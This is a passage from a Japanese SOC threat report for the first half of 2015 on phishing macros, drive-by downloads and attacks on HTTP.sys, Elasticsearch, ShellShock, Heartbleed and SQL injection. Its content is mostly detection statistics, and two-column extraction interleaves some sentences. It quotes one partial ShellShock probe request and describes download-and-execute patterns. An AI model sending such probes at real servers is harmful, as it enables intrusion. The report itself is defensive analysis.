を含む Microsoft Office ファイルを添付する攻撃が注
目されたことをお伝えしました。同様の攻撃は、今期
も継続して行われていることを確認しています。
図 16 は、不正なマクロを含むファイルが添付され
たメールの検知数の推移です。時期による変動はある
ものの、毎月 1 万件∼3 万件程度のメールを検知して
います。対象組織の業種や規模に偏りも見られないこ
とから、メールは不特定多数に対して広く送信されて
いると判断しています。
不正なマクロの実行で感染するマルウェアは、オン
ラインバンキングのアカウント情報の窃取を目的とす
る DRIDEX や DRIXED と呼ばれるマルウェアでした。
これは 2014 年下半期に確認された攻撃と同様であり、
該当マルウェアの感染を狙う攻撃者が引き続きこの攻
撃を行っていると考えられます。
事例も、毎月 1 件∼10 件程度継続して確認されていま
す（図 17）
。
不正なマクロを含むファイルが添付されたメールは
高度に作りこまれたものではなく、見た目でも警戒感
を抱きやすいものとなっています（図 18）
。また、同
種のメールが広く大量に送信されており、セキュリテ
ィー製品やスパムフィルタ等で排除されやすいため、
ユーザーの目に触れているメール数はそれほど多くな
いと想定されます。さらに、Microsoft Office の標準設
定では、ファイルを開いただけではマクロが実行され
ない設定となっているため、マクロの実行にはユーザ
ーによる明示的な許可が必要です（図 19）
。以上のよ
うに、攻撃の成功までにはいくつかのステップが必要
であるにも関わらず、この攻撃でも被害が発生してい
ます。
これは、識別や検知が比較的容易な攻撃であっても、
最終的に人が扱うものである以上、被害の発生を完全
に防ぐのは難しいことを示しています。
40,000
35,000
検知数
30,000
25,000
20,000
15,000
10,000
5,000
0
2015年1月
2015年2月
2015年3月
2015年4月
2015年5月
2015年6月
図 16. 不正なマクロを含むファイルが添付されたメールの検知数の推移
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日）
21
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
45
40
検知数
35
30
25
20
15
10
5
2015年6月
2015年5月
2015年4月
2015年3月
2015年2月
2015年1月
2014年12月
2014年11月
2014年10月
2014年9月
2014年8月
2014年7月
0
図 17. 不正なマクロの実行を示す通信の検知数の推移
（Tokyo SOC 調べ：2014 年 7 月 1 日∼2015 年 6 月 30 日）
図 18. 不正なマクロを含むファイルが添付されたメールの例
22
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
図 19. マクロを含むファイルを開いた際の警告画面
23
2015 年上半期 Tokyo SOC 情報分析レポート
クライアント PC を狙った攻撃
2.3 クライアント PC を狙った攻
撃のまとめ
今期、Tokyo SOC におけるドライブ・バイ・ダウン
ロード攻撃の検知数は 2,740 件と、2014 年下半期の
887 件と比較して約 3 倍に増加しました。また、ドラ
イブ・バイ・ダウンロード攻撃が確認された組織の割
合は 40.5%であり、2014 年下半期の 16.9%から増加
しています。
ており、アップデートや回避策の適用の難しさが改め
て示されました。
メールを悪用する攻撃も、不特定多数に対して広く
送信されるものから、標的を絞って行われるものまで、
攻撃が活発に行われています。
対象を絞って行われる攻撃では、メール文面やファ
イル名等が巧妙に細工されるため、攻撃件数は多くな
いものの成功率が高くなったり、被害の発生に長期間
気づくことができなかったりする状況が生じます。一
方、不特定多数に対して行われる攻撃では、個々の攻
撃の成功率は低いものの、最終的に人が扱うことの限
攻撃の増加は、Adobe Flash Player の脆弱性が相次
界として影響をゼロとすることは困難といえます。
いで公表され、攻撃ツールに組み込まれたことが要因
です。ドライブ・バイ・ダウンロード攻撃では過去 2
以上のような脅威に対して、攻撃の影響を緩和する
年以上にわたり、JRE の脆弱性を狙う攻撃が多数を占
ようなポリシーや教育、技術的な対策の実施は必須と
めていましたが、今期は 99%が Adobe Flash Player
なりますが、攻撃の影響をゼロにすることは困難であ
の脆弱性を狙う攻撃でした。
るという事実も同時に受け入れる必要があります。そ
Adobe Flash Player は JRE と比較してアップデート
が容易なアプリケーションと考えられますが、それで
の上で、影響の発生にいち早く気づき、適切に対処が
行える体制を構築していくことが重要です。
も脆弱性の悪用が成功してしまうケースを複数確認し
24
2015 年上半期 Tokyo SOC 情報分析レポート
[Column2] IBM X-Force Exchange のご紹介
IBM では 2015 年 4 月 16 日から脅威情報を共有するプラットフォームとして IBM X-Force Exchange を
公開しています。本コラムではこの IBM X-Force Exchange の活用方法をお伝えします。
l
脅威動向の入手
IBM X-Force Exchange にアクセスすると、
「現在の脅威のアクティビティー」および「過去 1 時間
の悪意のある IP」の情報がリアルタイムで表示されます(図 20)。組織において特定の攻撃活動が多
く観測されている場合には、このページで攻撃活動が自組織に限定されるものなのかを知ることが
できます。
図20. IBM X-Force Exchange トップページ
25
2015 年上半期 Tokyo SOC 情報分析レポート
l
セキュリティー情報の検索
トップページにある検索欄に次の情報を入力することで、より詳細な情報を検索できます。攻撃対
象となっているアプリケーションや攻撃元となっている IP アドレスが特定できている場合には、こ
れらの情報をもとに、より詳細な情報を得ることができます。また、各脆弱性情報の詳細ページで
は IBM IPS における対応シグネチャを確認することができます。
Ø
アプリケーション名
Ø
IP アドレス
Ø
URL
Ø
脆弱性名
Ø
MD5 値
図21. CVE-2014-6271 の検索結果
図22. 脆弱性情報に記載の IBM IPS の対応シグネチャ
26
2015 年上半期 Tokyo SOC 情報分析レポート
図23. IP アドレスの検索結果
IBM SOC では日々発生する脆弱性や攻撃動向について、本レポートや Tokyo SOC Blog などを通し
て情報発信していますが、各組織で観測された攻撃傾向についても多くお問い合わせをいただきま
す。そのような場合、IBM X-Force Exchange も併せてご利用いただければ幸いです。
27
2015 年上半期 Tokyo SOC 情報分析レポート
3 公開サーバーに対する攻撃の動向
2015 年上半期は、GHOST、FREAK、Logjam、VENOM といった名前がつけられた脆弱性が多く公
表されました。これらの脆弱性はそれぞれ特徴的な名前がつけられたことから大きな話題となりまし
たが、インターネット全体にわたって広く攻撃が行われている状況ではありません。
一方で、2014 年に名前がつけられた脆弱性である Heartbleed や ShellShock は 2015 年に入っても
引き続き活発に攻撃が行われている状況です。さらに、名前はつけられていませんが、2015 年上半期
に公表された HTTP.sys の脆弱性や Elasticsearch の脆弱性は Tokyo SOC でも実際の攻撃が確認されて
います。
本章では、2015 年上半期に Tokyo SOC で確認したこのような公開サーバーの脆弱性に対する攻
撃の動向について解説します。
Tokyo SOC では、FREAK や Logjam の脆弱性の有
3.1 今期のサーバーにおける
脆弱性概況
2015 年上半期は、
表 1 のとおり GHOST、
FREAK、
Logjam、VENOM といった名称がつけられた脆弱性
無を調査する行為と思われる通信を確認しています
が、被害を受けた事例は確認されていません。これ
らの脆弱性は、攻撃の影響を受ける条件が限定的等
の理由によりインターネット全体にわたって広く攻
撃が行われている状況ではないと考えられます。
一方、脆弱性の名称はつけられていませんが、
が多く公表されました。GHOST は GNU C ライブラ
HTTP.sys
リ
Elasticsearch の脆弱性 (CVE-2015-1427) は Tokyo
(glibc) の
gethostbyname 関数および
gethostbyname2 関数におけるバッファオーバーフ
ローの脆弱性、FREAK や Logjam は SSL/TLS での
暗号化通信の内容が解読・盗聴される恐れのある脆
弱性、VENOM は仮想環境においてゲスト OS から
の脆弱性 (CVE-2015-1635) や
SOC で実際の攻撃が確認されています。
これらの脆弱性に対する攻撃の Tokyo SOC での
検知状況は次項にて解説します。
ホスト OS や他のゲスト OS に対して攻撃が可能と
なる脆弱性です。
28
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
表 2. 2015 年上半期に公開されたサーバーにおける主な脆弱性
脆弱性通称
公開日
CVE No.
脆弱性説明
GNU C ライブラリ (glibc) の gethostbyname 関数および
gethostbyname2 関数には nss_hostname_digits_dots 関数
GHOST
2015 年 1 月 27 日
CVE-2015-0235
が原因となるバッファオーバーフローの脆弱性が存在します。
脆弱性を持つシステムにおいて、アプリケーションが特殊な形式
のドメイン名の名前解決を行った場合、システム上で悪意あるコ
ードが実行される可能性があります。
Elasticsearch の Groovy スクリプトエンジンの脆弱性です。
なし
2015 年 2 月 11 日
CVE-2015-1427
攻撃者は、特殊に細工した HTTP リクエストを送信することに
より、リモートから任意のコードを実行することが可能です。
EXPORT グレードの RSA 暗号スイートに関連する脆弱性です。
SSL 通信を行っているクライアントとサーバーの間の通信を、攻
FREAK
2015 年 3 月 4 日
CVE-2015-0204
撃者が中継できる状態にあり、かつクライアント及びサーバーが
CVE-2015-1067
特定の条件下で、暗号化通信が行われている場合に、攻撃者が
CVE-2015-1637
SSL 通信を暗号強度の低い EXPORT グレードの RSA 暗号スイー
トに変更することで、暗号化通信を盗聴・改ざんする可能性があ
ります。
Microsoft Windows の HTTP プロトコルスタック(HTTP.sys)
なし
2015 年 4 月 15 日
CVE-2015-1635
には HTTP リクエストの解析処理に脆弱性が存在します。
攻撃者は、特殊に細工した HTTP リクエストを送信することに
より、リモートから任意のコードを実行することが可能です。
QEMU の仮想フロッピードライブコントローラーにおけるバッ
ファオーバーフローの脆弱性です。
VENOM
2015 年 5 月 13 日
CVE-2015-3456
仮想環境において、攻撃者が通常は分離されているゲスト OS か
らホスト OS に対して、さらに他のゲスト OS に対してアクセス
し、任意のコードが実行される可能性があります。
Diffie-Hellman（DH）鍵交換を使用する TLS の脆弱性です。
SSL 通信を行っているクライアントとサーバーの間の通信を、攻
Logjam
2015 年 5 月 21 日
CVE-2015-1716
撃者が中継できる状態にある場合に、攻撃者が TLS 接続を
EXPORT グレードの暗号にダウングレードすることで、暗号化
通信を盗聴・改ざんする可能性があります。
29
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
3.2 HTTP.sys の脆弱性に対す
る攻撃
レスを送信元としており、次いで約 34%はアメリカ
の IP アドレスを送信元としています。また、攻撃対
象の国や業種に明確な偏りが見られないことから、
広く脆弱性の有無を調査する目的で攻撃が行われて
2015 年 4 月 15 日に公開されたマイクロソフト月
いるものと推測されます。
例のセキュリティ情報において、Windows の HTTP
本脆弱性は不正に任意のコードを実行できる可能
プロトコルスタック（HTTP.sys）に関する脆弱性が
公表、修正されました（ MS15-034
性のある脆弱性ですが、現在までのところ一般に入
/
手可能な攻撃コードとしてはシステムを停止、再起
CVE-2015-1635） 10。
動させることが可能なもののみであり、サーバーを
脆弱性公開直後に本脆弱性を利用してシステムを
乗っ取ったり、不正な情報窃取は行えないものとな
停止、再起動させることが可能な攻撃コードが公開
っています。そのため攻撃者側も本脆弱性を利用し
されており、Tokyo SOC では本脆弱性を狙う攻撃が
た攻撃を積極的には行っていない状況であると推測
行われていることを確認しています。
されます。
図 24 は日本を含む IBM SOC 全体における攻撃検
しかしながら、脆弱性公開当日から攻撃が発生し
知数の推移です。攻撃コードが公開されたことから、
ており、攻撃の対象となるシステムを利用している
脆弱性公開日より攻撃の検知を確認しています。
組織では早急に対策を行う必要がありました。
IBM SOC の世界全体での検知状況としては 1 日数十
件から数百件で推移しており、多い日は 1 日に 900
10
マイクロソフトセキュリティ情報 MS15-034 - 緊急
HTTP.sys の脆弱性により、リモートでコードが実行される
(3042553)
https://technet.microsoft.com/ja-JP/library/security/ms15034.aspx
件近く検知があります。日本国内に限ると 1 日あた
りほぼ 100 件以内の検知となっており大量に攻撃が
行われている状況とはなっていません。
検知している攻撃は調査目的と考えられる通信も
含まれていますが、攻撃の約 60%は中国の IP アド
1000
900
800
700
600
500
400
300
200
100
0
グローバルの検知数
2015/06/24
2015/06/17
2015/06/10
2015/06/03
2015/05/27
2015/05/20
2015/05/13
2015/05/06
2015/04/29
2015/04/22
2015/04/15
国内の検知数
図 24. HTTP.sys の脆弱性（MS15-034 / CVE-2015-1635）を狙う攻撃の検知数推移
(IBM SOC 調べ：2015 年 4 月 15 日∼2015 年 6 月 30 日, 検知総数 11,143 件)
30
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
3.3 Elasticsearch の脆弱性に
対する攻撃
いましたが、3 月 8 日より、2015 年 2 月に公表され
た脆弱性（CVE-2015-1427）を狙う攻撃についても
検知し始めています。Tokyo SOC で検知している攻
撃は、両脆弱性ともおよそ 80 個の中国の IP アドレ
2015 年 2 月 11 日、Elasticsearch に任意のコマン
スを送信元として、Elasticsearch が標準で利用する
ドを実行可能な脆弱性（CVE-2015-1427）が存在す
TCP 9200 番ポートに対して行われています。
ることが公表されました 11。Elasticsearch はオープ
攻撃の検知は 2015 年 5 月前半で収束しています
ンソースの全文検索エンジンで、国内外の多くの
が、外部からアクセス可能な環境で Elasticsearch を
Web サービスで利用されています。今後も大小さま
利用している場合には、今後も攻撃の対象となる可
ざまなサービスで広く採用されていくことが予想さ
能性があるため、脆弱性が解消されたバージョン
れます。3 月 16 日には、警察庁よりこの脆弱性を狙
（1.3.8 以上または 1.4.3 以上）へのアップデート、
う攻撃が行われているとして注意喚起が行われてい
または設定変更による対応を行ってください。
ます 12。
Tokyo SOC では、Elasticsearch の脆弱性を狙う攻
11
Elasticsearch 1.4.3 and 1.3.8 Released
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8released
12
Elasticsearch の脆弱性を標的としたアクセスの観測につい
て
http://www.npa.go.jp/cyberpolice/topics/?seq=15728
撃を確認しています。図 25 は、Tokyo SOC におけ
る攻撃の検知数推移です。Elasticsearch の脆弱性を
狙う攻撃に関しては、2014 年 5 月に公表された脆弱
性（CVE-2014-3120)を狙う攻撃を以前から検知して
80
CVE-2014-3120
70
CVE-2015-1427
60
50
40
30
20
10
2015/6/25
2015/6/18
2015/6/11
2015/6/4
2015/5/28
2015/5/21
2015/5/14
2015/5/7
2015/4/30
2015/4/23
2015/4/16
2015/4/9
2015/4/2
2015/3/26
2015/3/19
2015/3/12
2015/3/5
2015/2/26
2015/2/19
2015/2/12
2015/2/5
2015/1/29
2015/1/22
2015/1/15
2015/1/8
2015/1/1
0
図 25. Elasticsearch の脆弱性(CVE-2014-3120 および CVE-2015-1427)を狙う攻撃の検知数推移
(Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日, 検知総数 635 件)
31
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
3.4 ShellShock 攻撃(続報)
検知数が 1,000 件に満たない日も多く、比較的件数の
少ない状況が続いていました。
2014 年下半期 Tokyo SOC 情報分析レポート 13にて
ShellShock 攻撃は主にサーバー上での不正なプログ
ラム実行を目的としていたことをお知らせしました。
本項ではその後の検知状況と特徴について解説しま
す。
しかし、2015 年 4 月には検知数が増加し、1 日の検
知数が約 7 万件に達する日もありました。この期間中
の攻撃の詳細は後述しますが、ワームのように攻撃に
成功したサーバーが別のサーバーに対する攻撃を自動
的に行うプログラムが動作していたと考えられます。
その後、2015 年 5 月からは検知数が減少し、1 日数
n ShellShock 攻撃の検知状況
図 26 は 2015 年 1 月 1 日から 2015 年 6 月 30 日ま
での ShellShock 攻撃の検知数の推移です(脆弱性調査
行為は除く)。
脆弱性公開当初から 2014 年 12 月中旬まで、バック
ドアを設置したりする不正なプログラムをサーバー上
で実行することを目的とした攻撃や、サーバー上のパ
スワードファイル等を不正に取得することを目的とす
る攻撃の件数が 1 日に数千件程度の状況が継続してい
ました。12 月下旬以降、2015 年 3 月末までは 1 日の
十件程度で推移しています。
攻撃の内容としては、継続的にサーバー上で不正な
プログラムを動作させることを目的とするものが多く、
特定の NAS 製品を狙ったワームの活動と思われる通
信も引き続き活発に確認されています。
13
IBM Tokyo SOC, 2014 年下半期 Tokyo SOC 情報分析レポー
ト p.8-p.16 “GNU Bash に対する攻撃”。
http://www-935.ibm.com/services/multimedia/tokyo-soc-repor
t2014-h2-jp.pdf
70000
60000
50000
40000
30000
20000
10000
2015/6/25
2015/6/18
2015/6/11
2015/6/4
2015/5/28
2015/5/21
2015/5/14
2015/5/7
2015/4/30
2015/4/23
2015/4/16
2015/4/9
2015/4/2
2015/3/26
2015/3/19
2015/3/12
2015/3/5
2015/2/26
2015/2/19
2015/2/12
2015/2/5
2015/1/29
2015/1/22
2015/1/15
2015/1/8
2015/1/1
0
図 26. GNU Bash の脆弱性(CVE-2014-6271、他)を悪用する攻撃の検知数推移(日本国内)
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日, 検知総数 330,864 件）
32
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
n 送信元 IP アドレスの国別割合
攻撃を行っているワームのような動作がその要因のひ
2015 年上半期に行われた ShellShock 攻撃は約 6,000
とつとなっているものと考えられます。
の送信元 IP アドレスが確認されました。送信元 IP ア
特に日本を送信元とする攻撃に注目すると、検知数
ドレスの国別の割合では、アメリカ 25.6%( 前期
の約 60％はクラウド/ホスティング事業者や ISP の IP
36.8%)、ドイツ 11.0%(前期 15.0%)、中国 9.8%(前期
アドレスとなっており、これらの IP アドレスからの攻
0.2%)とこれらの 3 ヵ国が多くを占めているものの、
撃に、上述のワームと考えられる動作が見られる送信
約 100 カ国にわたる多数の国々の IP アドレスが送信
元も存在します。
元となっていました(図 27)。
このことからクラウドや ISP のユーザーが構築した
2014 年下半期は少数の送信元からの検知が多くを
サーバーに GNU Bash の脆弱性が存在したために
占めている状況でしたが、2015 年上半期についてはそ
ShellShock 攻撃の影響を受け、別のサーバーに対して
のような傾向は顕著には見られません。また、中国や
ShellShock 攻撃を行っている状況であると推測され
タイ、日本といったアジアの国からの割合が増加して
ます。
います。
ShellShock 攻撃による被害は報道等でもほとんど報
このような状況から、攻撃元の IP アドレスは分散化
じられていませんが、表面化はしていないものの、日
していく傾向にあり、ShellShock の脆弱性の影響を受
本国内においても攻撃の被害を受けているサーバーが
けたホストがさらに別のホストに対して ShellShock
少なからず存在するものと考えられます。
その他
28.4%
アメリカ
25.6%
カナダ
2.1%
ドイツ
11.0%
スペイン
2.2%
中国
タイ
9.8%
6.8%
イタリア
2.9%
日本
3.2%
インド
3.2%
フランス
4.8%
図 27. ShellShock 攻撃の送信元 IP アドレス国別割合(日本国内)
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日, 検知総数 330,864 件）
33
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
n ShellShock 攻撃対象の URL
撃において使用されていた攻撃ツールが、最初の攻撃
2015 年上半期に行われた ShellShock 攻撃の対象
時の HTTP リクエストとして下記を送信していたため
URL トップ 5 は、表 3 のとおりです。
と考えられます。
最も検知数の多い URL が「HTTP/1.1」となってい
ますが、これは 2015 年 4 月に増加した ShellShock 攻
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plain¥r¥n¥r¥nXSUCCESS!”;(攻撃文字列)
Host: <ip address>
Connection: Close
その他の URL についても ShellShock 攻撃ツールや
ワームに組み込まれた URL であり、攻撃者は引き続き
攻撃ツールを利用して広範囲に攻撃を行っているもの
と考えられます。
表 3. ShellShock 攻撃の攻撃先 URL トップ 5 (日本国内)
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日, 検知総数 330,864 件）
No.
URL
件数
1
HTTP/1.1
51,633
2
/cgi-bin/authLogin.cgi
41,548
3
/
22,990
4
/phppath/php
8,309
5
/cgi-bin/test.cgi
8,074
34
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
n 通信パターンの分析による攻撃の分類
- | perl: パイプ機能によって外部サーバーからダウ
IBM SOC で観測された 2015 年 6 月までの HTTP サ
ンロードしたスクリプトを perl に読み込ませて実行を
ーバーに対する攻撃を分析し、脆弱性を利用した攻撃
試みるパターンです。
コードに含まれる文字列からいくつかのパターンに分
- /s.php、/gate.php: 攻撃が成功した場合、外部の
類しました。それぞれのパターンに見られる特徴的な
HTTP サーバーにアクセスして攻撃対象の HTTP サー
バーを動作させているユーザ名を送信することを試み
文字列をもとに解説します。
るパターンです。送信時に利用する URL の末尾が
/s.php もしくは/gate.php となっているのが特徴です。
- bash_cve_2014_6271_rce: Bash の脆弱性の有無
- /etc/passwd: 攻撃が成功した場合に攻撃対象サー
を確認する目的とみられる攻撃パターンです。攻撃成
バー上の passwd ファイルを表示させるパターンです。
功時の出力に計算式が含まれており、実際に命令が実
- HDB_DATA: NAS 製品の脆弱性を利用して外部サ
行されているかどうかを確認しています。脆弱性スキ
ーバーからスクリプトをダウンロードし、攻撃対象の
ャナである Nessus のプラグインにも同様の文字列が
サーバー上で実行を試みるパターンです。
含まれています。
- XSUCCESS: 攻撃が成功した場合に`XSUCCESS`
これらのパターンの観測数を図 28 で表しています。
という文字列を出力する攻撃パターンです。外部サー
それぞれ特徴となる文字列を含んだ攻撃イベントを集
バーからスクリプトをダウンロードし、攻撃対象のサ
計した結果の割合を示しています。上記のパターンだ
ーバー上での実行を試みる攻撃と、外部サーバーへの
けで観測数の約 45%を占めています。
アクセスを試みるだけの攻撃があります。
19.18%
bash_cve_2014_6271_rce
XSUCCESS
8.41%
54.12%
7.11%
5.67%
3.76%
1.74%
%7C perl
/s.php /gate.php
/etc/passwd
HDB_DATA
その他
図 28. ShellShock 攻撃の観測された特徴的な通信と観測数の割合
（IBM SOC 調べ：2014 年 9 月 26 日∼2015 年 6 月 30 日, 検知総数 18,197,453 件）
35
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
分類された攻撃ごとに検知数の推移を表したグラフ
月初旬にはピークを迎えますが、その後急速に減少し
が図 29 になります。検知数上位 4 種類である
ているのがわかります。出現数 2 位の XSUCCESS は
bash_cve_2014_6271_rce、XSUCCESS、| perl、/s.php
11 月初旬より散発的に攻撃コードが確認されてきま
および/gate.php の推移数を表しており、攻撃の分類は
したが、4 位の/s.php および/gate.php とともに 2015
時系列上でも特徴が現れていることがわかります。最
年 4 月 8 日〜10 日に大量のイベントが発生しています。
も件数が多い bash_cve_2014_6271_rce は長期間に
また、4 月下旬にも XSUCCESS の文字列が含まれる
わたって断続的にイベントを検知しています。このイ
攻撃コードによって大規模な攻撃が発生していました。
ベントは脆弱性有無の確認を目的とした攻撃コードで
各攻撃パターンに見られる攻撃元と攻撃先の傾向に
あり、定期的に調査をしているものと考えられます。
ついては Column 3 にて解説しますが、同じ脆弱性を
perl にパイプ機能でスクリプトを読み込ませる|perl は
利用する攻撃も攻撃ツールや攻撃コードのトレンドが
脆弱性出現直後の 2014 年 10 月中旬より観測され 11
変化していることがわかります。
500000
450000
400000
350000
300000
250000
200000
150000
100000
50000
0
2015/6/25
2015/6/11
2015/5/28
2015/5/14
2015/4/30
2015/4/16
2015/4/2
2015/3/19
2015/3/5
2015/2/19
2015/2/5
2015/1/22
2015/1/8
2014/12/25
2014/12/11
2014/11/27
2014/11/13
2014/10/30
2014/10/16
2014/10/2
XSUCCESS
bash_cve_2014_6271_rce
php
perl
図 29. ShellShock 攻撃の観測された特徴的な通信トップ 4 の検知数推移
（IBM SOC 調べ：2014 年 9 月 26 日∼2015 年 6 月 30 日, 検知総数 7,347,642 件）
36
2015 年上半期 Tokyo SOC 情報分析レポート
3.5 Heartbleed 攻撃 (続報)
の検知数が 7 万件を超える日も発生しています。そ
の後も検知数が多い状況が継続している状況です。
本項では、Heartbleed 攻撃の検知状況と特徴につ
いて解説します。
攻撃が最も多かった 2014 年 4 月の脆弱性公開直後
の 1 日あたりの最大の検知数が 20 万件程度だったの
で、その 30%以上の検知数となっています。世界全
体でも同様の傾向となっており、1 日の検知数とし
n Heartbleed 攻撃の検知状況
図 30 は、2015 年 1 月から 2015 年 6 月までの世
界全体と日本国内での検知状況です。日本国内につ
いて、2015 年 6 月中旬までは、前期より引き続き 1
日あたり最大でも 5,000 件程度の検知数で推移して
いましたが、6 月 15 日頃より検知数が増加し、1 日
ては 40 万件を超える日も発生しています。
脆弱性公開から 1 年以上経ったこの時期に検知が
増加した理由については不明ですが、インターネッ
ト上にはいまだに脆弱性が存在するサーバーが一定
数あり、公開から時間が経った脆弱性であっても攻
撃者が積極的に悪用を試みている状況であると推測
されます。
450000
400000
350000
300000
250000
200000
150000
100000
50000
2015/1/1
2015/1/8
2015/1/15
2015/1/22
2015/1/29
2015/2/5
2015/2/12
2015/2/19
2015/2/26
2015/3/5
2015/3/12
2015/3/19
2015/3/26
2015/4/2
2015/4/9
2015/4/16
2015/4/23
2015/4/30
2015/5/7
2015/5/14
2015/5/21
2015/5/28
2015/6/4
2015/6/11
2015/6/18
2015/6/25
0
Global全体
日本国内
図 30. OpenSSL の脆弱性(CVE-2014-0160)を悪用する攻撃の検知数の推移
（IBM SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日, 検知総数 3,384,163 件）
37
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
n Heartbleed 攻撃の送信元
スペイン(4.9%)となっており、ヨーロッパの国からの
図 31 は Tokyo SOC で検知した Heartbleed 攻撃の
割合が多くなっています。
送信元 IP アドレスの国別検知数の割合です。
また、攻撃先については組織や業種によらず幅広く
2014 年下半期まではアメリカの IP アドレスが最も
行われており、特定の組織や業種をターゲットにして
多くの割合を占めていましたが、今期は 4.4%となっ
攻撃が行われている状況ではありません。さらに、攻
ています。2015 年上半期は 6 月からの検知数増加時
撃の送信元に対するあて先の重複が少なくなっており、
に送信元となっていた IP アドレスの国が多くを占め
複数の攻撃元ホストが協調して攻撃を行っているもの
ている状況です。最も検知数が多かった国がイギリス
と考えられます。
(33.8%)、次いでベルギー(12.1%)、ルーマニア(9.9%)、
このことから、特定の攻撃基盤を持つ攻撃者が、イ
フランス(9.7%)、オランダ(6.6%)、エストニア(5.0%)、
ンターネット全体にわたって集中的に攻撃を行ってい
るものと推測されます。
スイスドイツ
2.7% 2.5%
その他
8.4%
アメリカ
4.4%
イギリス
33.8%
スペイン
4.9%
エストニア
5.0%
オランダ
6.6%
フランス
9.7%
ルーマニア
9.9%
ベルギー
12.1%
図 31. OpenSSL の脆弱性(CVE-2014-0160)を悪用する攻撃の送信元 IP アドレス国の割合
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日）
38
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
3.6 SQL インジェクション
2015 年上半期はさらに検知数が増加し、2014 年下
半期と比較して約 1.7 倍となっています。これは、
SQL インジェクションは、Web アプリケーション
への入力を介して Web アプリケーションと連動す
るデータベースに SQL 命令を不正に実行させる攻
撃です。挿入した SQL 文の問い合わせ結果の違いに
よって攻撃者が得たい情報を引き出す「ブラインド
SQL インジェクション」や、攻撃者が意図した情報
2014 年下半期にも見られた短期間に少数の送信元
より少数の宛先に対して大量に攻撃を行う傾向がさ
らに顕著になっているためで、多い日は 1 日に 45
万件程度の検知があります。
今期は特に SQL 文の「WAIT FOR DELAY」句を
使用した SQL インジェクション攻撃の検知数が前
期と比較して約 4.5 倍となっています。
を取得するために UNION 命令などの SQL 文を使用
攻撃の内容としては対象の Web アプリケーショ
したもの、Microsoft SQL Server など特定のデータ
ンに対して SQL インジェクションの脆弱性の有無
ベース製品固有の機能による情報取得や Web サイ
を調査する行為です。引き続き攻撃者が調査ツール
ト改ざんを行うものなど、さまざまな攻撃手法が存
を使用して自動的に調査行為を行っているものと考
在します。
えられますが、今期の傾向として、特に 2015 年 2
図 32 は 2015 年上半期の Tokyo SOC における
月から 4 月の間、中国の IP アドレスから主に国内の
SQL インジェクション攻撃の検知数の推移です。
金融機関を対象に集中的に調査行為が行われていた
2014 年下半期には、2014 年上半期と比較して検知
ことが挙げられます。
総数が 2.2 倍となったことをお知らせしましたが、
500,000
450,000
400,000
350,000
300,000
250,000
200,000
150,000
100,000
50,000
0
Union命令を使用するSQLインジェクション
Microsoft SQL Serverを狙う攻撃
2015/06/18
2015/06/04
2015/05/21
2015/05/07
2015/04/23
2015/04/09
2015/03/26
2015/03/12
2015/02/26
2015/02/12
2015/01/29
2015/01/15
2015/01/01
ブラインドSQLインジェクション
図 32. SQL インジェクションの日別検知数推移(日本国内)
（Tokyo SOC 調べ：2015 年 1 月 1 日∼2015 年 6 月 30 日）
39
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
このように、SQL インジェクションの脆弱性に対
SQL インジェクションによる被害を未然に防ぐた
する攻撃は引き続き確認されており、攻撃者は調査
めに、ソフトウェアのアップデートや、情報処理推
ツールなどを利用して自動的に Web サイトの脆弱
進機構(IPA)が発行している「安全なウェブサイトの
性の有無を継続的に調査している状況であるため、
作り方」 14などを参考に対策を実施してください。
既存の Web アプリケーションであっても、更新や更
改時等に脆弱性を含んだまま公開してしまうと、攻
撃者によって短期間のうちに悪用される可能性が高
14
独立行政法人情報処理推進機構, 安全なウェブサイトの作
り方
http://www.ipa.go.jp/security/vuln/websecurity.html
く、注意が必要な攻撃であると言えます。
40
2015 年上半期 Tokyo SOC 情報分析レポート
公開サーバーに対する攻撃の動向
3.7 公開サーバーに対する攻撃
の動向のまとめ
2014 年下半期に発生した ShellShock 攻撃に引
き続き、2015 年上半期は Windows の HTTP プ
ロトコルスタックである HTTP.sys の脆弱性でも
公開直後に攻撃ツールが公開され、攻撃が行われ
ている状況が確認されました。現状は攻撃の影響
はサービス停止にとどまっており、インターネッ
ト全体で大量に攻撃が行われている状況とはな
っていませんが、影響を受けるシステムを利用し
ている組織では早急に対応を実施する必要があ
ります。
また、Elasticsearch の脆弱性については、公開
時にはほとんど話題にはなりませんでしたが、
2015 年上半期はこの Elasticsearch の脆弱性に対
する複数の中国の IP アドレスからの攻撃が確認
されました。以前に取り上げた Apache Struts の
脆弱性同様、Web サイト環境におけるミドルウ
ェア的な位置づけの製品の脆弱性が今回も狙わ
れた形となっています。攻撃者は今後も引き続き
この分野の脆弱性を狙って攻撃を行ってくると
考えられます。
また、このような脆弱性に迅速に対処するため
に、オープンソースソフトウェアも含めた自組織
におけるソフトウェアの利用状況を把握してお
くことの重要性が改めて確認されました。
さらに、 2014 年に発生した Heartbleed や
ShellShock といった攻撃は 2015 年も引き続き活
